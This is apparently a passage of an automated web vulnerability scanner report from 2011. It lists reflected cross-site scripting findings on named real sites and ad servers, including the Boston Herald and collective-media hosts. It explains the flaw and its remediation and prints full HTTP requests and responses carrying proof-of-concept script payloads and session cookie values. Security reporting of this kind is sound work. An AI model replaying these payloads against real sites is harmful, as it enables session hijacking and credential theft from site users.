http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 3]
http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 4]
http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 5]
http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 5]
http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 6]
http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 7]
http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 8]
http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 5]
http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 6]
http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 7]
http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 8]
http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2011/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/ [REST URL parameter 5]
http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ [REST URL parameter 5]
http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ [REST URL parameter 6]
http://www.bostonherald.com/includes/processAds.bg [companion parameter]
http://www.bostonherald.com/includes/processAds.bg [companion parameter]
http://www.bostonherald.com/includes/processAds.bg [page parameter]
http://www.bostonherald.com/includes/processAds.bg [page parameter]
http://www.bostonherald.com/includes/processAds.bg [position parameter]
http://www.bostonherald.com/includes/processAds.bg [position parameter]
http://www.bostonherald.com/mediacenter/ [name of an arbitrarily supplied request parameter]
http://www.bostonherald.com/mediacenter/video.php [bc_id parameter]
http://www.bostonherald.com/mediacenter/video.php [height parameter]
http://www.bostonherald.com/mediacenter/video.php [media_id parameter]
http://www.bostonherald.com/mediacenter/video.php [name of an arbitrarily supplied request parameter]
http://www.bostonherald.com/mediacenter/video.php [program_id parameter]
http://www.bostonherald.com/mediacenter/video.php [program_id parameter]
http://www.bostonherald.com/mediacenter/video.php [src parameter]
http://www.bostonherald.com/mediacenter/video.php [title parameter]
http://www.bostonherald.com/mediacenter/video.php [width parameter]
http://www.bostonherald.com/news/politics/view.bg [format parameter]
http://www.bostonherald.com/news/regional/view.bg [format parameter]
http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter]
http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter]
http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter]
http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter]
http://www.bostonherald.com/projects/payroll/quasi_state/ [name of an arbitrarily supplied request parameter]
http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter]
http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter]
http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter]
http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter]
http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter]
http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter]
http://www.bostonherald.com/search/ [topic parameter]
http://www.bostonherald.com/search/ [topic parameter]
http://www.cbs6albany.com/albany-community/ [REST URL parameter 1]
http://www.cbs6albany.com/albany-community/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/albany-tv-programming/ [REST URL parameter 1]
http://www.cbs6albany.com/albany-tv-programming/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/albany-weather-forecast [REST URL parameter 1]
http://www.cbs6albany.com/albany-weather-forecast [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/common/archives/ [cat parameter]
http://www.cbs6albany.com/common/archives/ [cat parameter]
http://www.cbs6albany.com/common/archives/ [cat parameter]
http://www.cbs6albany.com/common/archives/ [db parameter]
http://www.cbs6albany.com/common/tools/load.php [css parameter]
http://www.cbs6albany.com/common/tools/load.php [js parameter]
http://www.cbs6albany.com/common/tools/load.php [js parameter]
http://www.cbs6albany.com/common/tools/load.php [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/common/tools/load.php [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/abouthdtv/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/contactus/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/contactus/newstips/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/employmentopportunities/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/jobsonline/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/live-cameras/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/local-news/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/local-sports/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/production-department/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/publicfile/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/sales/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/satellitewaivers/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/schoolclosures/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/sitemap/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/sp-alerts/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/thirdParty/iframe_header/ [taxonomy parameter]
http://www.cbs6albany.com/sections/traffic-events/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/traffic/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/tvlistings/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/videocopies/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/weather/7day/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/web-links/ [name of an arbitrarily supplied request parameter]
http://www.cbs6albany.com/sections/wrgb-talent/ [name of an arbitrarily supplied request parameter]
http://www.collegeanduniversity.net/herald/ [name of an arbitrarily supplied request parameter]
http://www.mixpo.com/videoad/kD3_P_IRSdu0NijksWoruw/Chevrolet-LMA [REST URL parameter 2]
http://www.moxiesoft.com/search.aspx [searchtext parameter]
http://www.moxiesoft.com/search.aspx [searchtext parameter]
http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1 [REST URL parameter 1]
http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm [REST URL parameter 1]
http://www.nydailynews.com/blogs70f75/ [REST URL parameter 1]
http://www.paperg.com/jsfb/embed.php [bid parameter]
http://www.paperg.com/jsfb/embed.php [bid parameter]
http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]
http://www.paperg.com/jsfb/embed.php [pid parameter]
http://www.quantcast.com/p-352ZWwG8I7OVQ [REST URL parameter 1]
http://www.quantcast.com/p-352ZWwG8I7OVQ [REST URL parameter 1]
http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/component/yvcomment/ [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/features/destinations [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/news/mishaps-a-rescues/index.php [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/news/sailing [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/news/todays-top-stories [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/resources [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/site-map [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/subscription-services [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/subscription-services/preview-current-issue [name of an arbitrarily supplied request parameter]
http://www.zvents.com/ [376e5%22%3E%3Cscript%3Ealert(1 parameter]
http://www.zvents.com/ [376e5%22%3E%3Cscript%3Ealert(document.cookie parameter]
http://www.zvents.com/ [name of an arbitrarily supplied request parameter]
http://www.zvents.com/albany-ny/events [REST URL parameter 1]
http://www.zvents.com/albany-ny/events [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [Referer HTTP header]
http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [Referer HTTP header]
http://ar.imlive.com/ [Referer HTTP header]
http://ar.imlive.com/waccess/ [Referer HTTP header]
http://br.imlive.com/ [Referer HTTP header]
http://br.imlive.com/waccess/ [Referer HTTP header]
http://cafr.imlive.com/ [Referer HTTP header]
http://cafr.imlive.com/waccess/ [Referer HTTP header]
http://de.imlive.com/ [Referer HTTP header]
http://de.imlive.com/waccess/ [Referer HTTP header]
http://dk.imlive.com/ [Referer HTTP header]
http://dk.imlive.com/waccess/ [Referer HTTP header]
http://es.imlive.com/ [Referer HTTP header]
http://es.imlive.com/waccess/ [Referer HTTP header]
http://fr.imlive.com/ [Referer HTTP header]
http://fr.imlive.com/waccess/ [Referer HTTP header]
http://gr.imlive.com/ [Referer HTTP header]
http://gr.imlive.com/waccess/ [Referer HTTP header]
http://ib.adnxs.com/ttj [Referer HTTP header]
http://imlive.com/ [Referer HTTP header]
http://imlive.com/GuestDiscountClubs.aspx [Referer HTTP header]
http://imlive.com/SiteInformation.html [Referer HTTP header]
http://imlive.com/awardarena/ [Referer HTTP header]
http://imlive.com/become_celeb.asp [Referer HTTP header]
http://imlive.com/become_host.asp [Referer HTTP header]
http://imlive.com/becomehost.aspx [Referer HTTP header]
http://imlive.com/categoryfs.asp [Referer HTTP header]
http://imlive.com/categoryfs.asp [Referer HTTP header]
http://imlive.com/categoryms.asp [Referer HTTP header]
http://imlive.com/categoryms.asp [Referer HTTP header]
http://imlive.com/customerservice.asp [Referer HTTP header]
http://imlive.com/disclaimer.asp [Referer HTTP header]
http://imlive.com/forgot.asp [Referer HTTP header]
http://imlive.com/forgot.aspx [Referer HTTP header]
http://imlive.com/homepagems3.asp [Referer HTTP header]
http://imlive.com/hostmembers.asp [Referer HTTP header]
http://imlive.com/live-sex-chats/ [Referer HTTP header]
http://imlive.com/live-sex-chats/adult-shows/ [Referer HTTP header]
http://imlive.com/live-sex-chats/cam-girls/ [Referer HTTP header]
http://imlive.com/live-sex-chats/cam-girls/categories/ [Referer HTTP header]
http://imlive.com/live-sex-chats/cam-girls/hotspots/ [Referer HTTP header]
http://imlive.com/live-sex-chats/cams-aroundthehouse/ [Referer HTTP header]
http://imlive.com/live-sex-chats/caught-on-cam/ [Referer HTTP header]
http://imlive.com/live-sex-chats/couple/ [Referer HTTP header]
http://imlive.com/live-sex-chats/fetish/ [Referer HTTP header]
http://imlive.com/live-sex-chats/fetish/categories/ [Referer HTTP header]
http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [Referer HTTP header]
http://imlive.com/live-sex-chats/free-sex-video/ [Referer HTTP header]
http://imlive.com/live-sex-chats/gay-couple/ [Referer HTTP header]
http://imlive.com/live-sex-chats/gay/ [Referer HTTP header]
http://imlive.com/live-sex-chats/guy-alone/ [Referer HTTP header]
http://imlive.com/live-sex-chats/happyhour/ [Referer HTTP header]
http://imlive.com/live-sex-chats/lesbian-couple/ [Referer HTTP header]
http://imlive.com/live-sex-chats/lesbian/ [Referer HTTP header]
http://imlive.com/live-sex-chats/live-sex-video/ [Referer HTTP header]
http://imlive.com/live-sex-chats/nude-chat/ [Referer HTTP header]
http://imlive.com/live-sex-chats/orgies/ [Referer HTTP header]
http://imlive.com/live-sex-chats/pornstars/ [Referer HTTP header]
http://imlive.com/live-sex-chats/role-play/ [Referer HTTP header]
http://imlive.com/live-sex-chats/sex-show-galleries/ [Referer HTTP header]
http://imlive.com/live-sex-chats/sex-show-photos/ [Referer HTTP header]
http://imlive.com/live-sex-chats/sex-show-sessions/ [Referer HTTP header]
http://imlive.com/live-sex-chats/sex-video-features/ [Referer HTTP header]
http://imlive.com/live-sex-chats/shemale-couple/ [Referer HTTP header]
http://imlive.com/live-sex-chats/shemale/ [Referer HTTP header]
http://imlive.com/live-sex-chats/shy-girl/ [Referer HTTP header]
http://imlive.com/liveexperts.asp [Referer HTTP header]
http://imlive.com/localcompanionship.asp [Referer HTTP header]
http://imlive.com/login.asp [Referer HTTP header]
http://imlive.com/minglesingles.asp [Referer HTTP header]
http://imlive.com/pr.asp [Referer HTTP header]
http://imlive.com/preparesearch.asp [Referer HTTP header]
http://imlive.com/preparesearch.aspx [Referer HTTP header]
http://imlive.com/search.asp [Referer HTTP header]
http://imlive.com/sitemap.html [Referer HTTP header]
http://imlive.com/videosfr.asp [Referer HTTP header]
http://imlive.com/warningms.asp [Referer HTTP header]
http://imlive.com/webcam-advanced-search/ [Referer HTTP header]
http://imlive.com/webcam-faq/ [Referer HTTP header]
http://imlive.com/webcam-login/ [Referer HTTP header]
http://imlive.com/webcam-sign-up/ [Referer HTTP header]
http://imlive.com/wmaster.ashx [Referer HTTP header]
http://imlive.com/wmaster.ashx [Referer HTTP header]
http://in.imlive.com/ [Referer HTTP header]
http://in.imlive.com/waccess/ [Referer HTTP header]
http://it.imlive.com/ [Referer HTTP header]
http://it.imlive.com/waccess/ [Referer HTTP header]
http://jp.imlive.com/ [Referer HTTP header]
http://jp.imlive.com/waccess/ [Referer HTTP header]
http://mx.imlive.com/ [Referer HTTP header]
http://mx.imlive.com/waccess/ [Referer HTTP header]
http://nl.imlive.com/ [Referer HTTP header]
http://nl.imlive.com/waccess/ [Referer HTTP header]
http://no.imlive.com/ [Referer HTTP header]
http://no.imlive.com/waccess/ [Referer HTTP header]
http://onset.freedom.com/fi/analytics/cms/ [Referer HTTP header]
http://pu.imlive.com/ [Referer HTTP header]
http://pu.imlive.com/waccess/ [Referer HTTP header]
http://ru.imlive.com/ [Referer HTTP header]
http://ru.imlive.com/waccess/ [Referer HTTP header]
http://se.imlive.com/ [Referer HTTP header]
http://se.imlive.com/waccess/ [Referer HTTP header]
http://tr.imlive.com/ [Referer HTTP header]
http://tr.imlive.com/waccess/ [Referer HTTP header]
http://www.addthis.com/bookmark.php [Referer HTTP header]
http://www.addthis.com/bookmark.php [Referer HTTP header]
http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [cli cookie]
http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [cli cookie]
http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [cli cookie]
http://a.collective-media.net/cmadj/q1.bosherald/be_ent [cli cookie]
http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [cli cookie]
http://a.collective-media.net/cmadj/q1.bosherald/ent [cli cookie]
http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [cli cookie]
http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [cli cookie]
http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]
http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]
http://ar.voicefive.com/bmx3/broker.pli [UID cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [FFpb cookie]
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]
http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [FFpb cookie]
http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [ZEDOIDA cookie]
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [FFpb cookie]
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [FFpb cookie]
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]
http://tag.contextweb.com/TAGPUBLISH/getad.aspx [V cookie]
http://tag.contextweb.com/TAGPUBLISH/getad.aspx [cwbh1 cookie]
http://xads.zedo.com/ads2/c [a parameter]
http://xads.zedo.com/ads2/c [name of an arbitrarily supplied request parameter]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

4.1. http://a.collective-media.net/ad/cm.quadbostonherald/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/ad/cm.quadbostonherald/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d1f99<script>alert(1)</script>c1a752a6f1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /add1f99<script>alert(1)</script>c1a752a6f1e/cm.quadbostonherald/ HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 78
Date: Sat, 29 Jan 2011 05:19:59 GMT
Connection: close

unknown path /add1f99<script>alert(1)</script>c1a752a6f1e/cm.quadbostonherald/

4.2. http://a.collective-media.net/ad/q1.bosherald/be_ent [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/ad/q1.bosherald/be_ent

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e4883<script>alert(1)</script>33df23666f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ade4883<script>alert(1)</script>33df23666f7/q1.bosherald/be_ent HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 77
Date: Sat, 29 Jan 2011 05:20:04 GMT
Connection: close

unknown path /ade4883<script>alert(1)</script>33df23666f7/q1.bosherald/be_ent

4.3. http://a.collective-media.net/ad/q1.bosherald/be_ent [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://a.collective-media.net
Path:	/ad/q1.bosherald/be_ent

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3829b(a)65fe352989c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /ad3829b(a)65fe352989c/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438? HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 313
Date: Sat, 29 Jan 2011 05:19:59 GMT
Connection: close

unknown path /ad3829b(a)65fe352989c/q1.bosherald/be_ent;cmw=owl;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x
...[SNIP]...

4.4. http://a.collective-media.net/ad/q1.bosherald/be_ent_fr [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/ad/q1.bosherald/be_ent_fr

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b71ea<script>alert(1)</script>43f8c2f9671 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adb71ea<script>alert(1)</script>43f8c2f9671/q1.bosherald/be_ent_fr HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 80
Date: Sat, 29 Jan 2011 05:19:45 GMT
Connection: close

unknown path /adb71ea<script>alert(1)</script>43f8c2f9671/q1.bosherald/be_ent_fr

4.5. http://a.collective-media.net/ad/q1.bosherald/be_ent_fr [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://a.collective-media.net
Path:	/ad/q1.bosherald/be_ent_fr

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 79356(a)67f94803f26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /ad79356(a)67f94803f26/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561? HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 314
Date: Sat, 29 Jan 2011 05:19:51 GMT
Connection: close

unknown path /ad79356(a)67f94803f26/q1.bosherald/be_ent_fr;cmw=owl;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP30
...[SNIP]...

